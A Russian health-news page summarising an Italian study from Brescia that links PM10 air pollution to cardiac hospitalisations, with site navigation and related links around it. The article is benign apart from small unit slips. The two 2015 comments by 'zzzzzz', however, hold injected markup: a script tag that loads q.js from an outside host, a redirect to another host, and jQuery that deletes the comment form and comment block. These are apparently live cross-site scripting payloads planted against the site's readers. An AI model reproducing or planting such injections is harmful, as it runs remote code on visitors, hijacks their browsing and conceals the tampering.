Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Грязный воздух может оста...  >>  Грязный воздух может остановить сердце
 
Обратная связь
 

Грязный воздух может остановить сердце

Размер шрифта
03 марта 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Команда итальянских ученых утверждает, что особые частицы в воздухе негативно влияют на здоровье нашего внутреннего «мотора».

Грязный воздух может остановить сердце

Исследовательская группа, возглавляемая доктором Савиной Нодари, базируется в городе Брешиа.

«За последние десятилетия масштабы загрязнения воздуха непрерывно возрастали», – рассказывает доктор Нодари. «И несмотря на все старания экологических и социальных служб, негативное влияние загрязненного воздуха на здоровье человека продолжает оставаться важным фактором».

«В некоторых научных работах, проводившихся на территории США и Евросоюза, показано, что особенно пагубным воздействием обладают малые и ультрамалые частицы – диаметром примерно 10 мкм. При этом вызываемый ими круг патологий отнюдь не ограничивается респираторными заболеваниями», – продолжает она. «Евросоюз рассматривает 50 мкг/м3 как предельно допустимую концентрацию таких частиц в воздухе, однако есть данные, что для сердечно-сосудистой системы этот порог еще меньше».

В данном исследовании ученые решили детальнее изучить взаимосвязь между концентрацией этих частиц (в экологической номенклатуре они маркируются как PM10) и риском сердечно-сосудистых заболеваний. Ученые сопоставляли статистические данные кардиологических отделений (число поступивших с острым коронарным синдромом, сердечной недостаточностью, желудочковой аритмией и так далее) с архивной информации касательно уровня загрязнения воздуха в Брешии с 2004 по 2007 годы.

Оказалось, что существует мощная корреляция между концентрацией PM10 и уровнем госпитализации с острой сердечно-сосудистой патологией. Связь носила линейный характер: каждые дополнительные 10 мкм/м3 вредных частиц усугубляли статистику госпитализации на 3%.

«Брешиа является одним из самых индустриализированных городов Северной Италии, поэтому согласно данным европейских экспертов средняя концентрация PM10 здесь превышает установленный предельный уровень. Что, конечно, соответствующим образом сказывается на здоровье населения», – объясняет Нодари.

«Выявленная нами закономерность оказалась особенно справедливой для пожилых людей (старше 65 лет). Наличие у них сопутствующих хронических заболеваний и изношенность сердечно-сосудистой системы делает последнюю особенно уязвимой к загрязнению воздуха», – рассказывает Нодари.

«Другая группа риска – пациенты, уже перенесшие в прошлом эпизод острой сердечной патологии».

Негативное влияние PM10 связывают с тем, что эти частицы, по-видимому, стимулируют процессы воспаления и свертывания крови.

«Загрязнение воздуха – это огромная проблема, потому что мы не можем напрямую уберечь от нее людей», – говорит Нодари. «Нужно менять окружающую среду! Государства должны поощрять развитие альтернативных источников энергии и экологическую оптимизацию индустриальных процессов. И, конечно, необходимо снижать уровень предельно допустимой концентрации PM10 ниже 50 мкг/м3. Он слишком высок, поскольку такая концентрация сопряжена с неудовлетворительной статистикой госпитализации по кардиологической патологии. Оптимальная цифра – 20-30 мкг/м3, или даже меньше».

А у вас дома воздух – качественный и здоровый? Как удостовериться, что ваш дом – ваша крепость, а не бомба замедленного действия? Читайте материалы нашего специального проекта «Насколько токсичен мой дом» и вы узнаете об этом все.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:46

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:44

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
У вас больное сердце! Нет? А если нагнуться?   Как понять, что вы пьете слишком много? Или уже спиваетесь?   Горький шоколад полезен для сердца! Но все благодаря бактериям!   Бегом на улицу! Солнце понижает давление!  
22 июня 2013Грецкие орехи спасут от инфаркта 18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?
 
12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого? 01 ноября 2013ИНВИТРО – «Марка №1» в России
 

Слайдшоу

1
Вся правда о грибке стоп
Как дышать правильно
5 напитков, которые защитят ваше сердце

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.